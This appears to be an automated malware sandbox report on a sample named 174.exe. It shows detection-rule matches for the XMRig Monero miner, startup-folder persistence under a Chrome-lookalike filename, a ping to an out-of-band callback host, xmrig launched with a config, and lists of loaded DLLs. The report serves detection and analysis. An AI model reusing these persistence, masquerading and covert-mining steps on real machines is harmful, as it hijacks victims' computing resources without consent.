Source: 11.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 11.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.0.xmrig.exe.7ff6023e0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000008.00000000.1796096709.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000B.00000000.1861121743.00007FF602807000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: xmrig.exe PID: 5752, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: xmrig.exe PID: 7340, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: WinRing0x64.sys.1.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.adwa.evad.mine.winEXE@17/17@6/6

Source: C:\Users\user\Desktop\174.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_03

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4iyul4z.mba.ps1

Jump to behavior

Source: C:\Users\user\Desktop\174.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\174.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 174.exe	Virustotal: Detection: 42%
Source: 174.exe	ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\174.exe "C:\Users\user\Desktop\174.exe"
Source: C:\Users\user\Desktop\174.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\174.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\174.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe"	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json	Jump to behavior

Source: C:\Users\user\Desktop\174.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: apphelp.dll	Jump to behavior
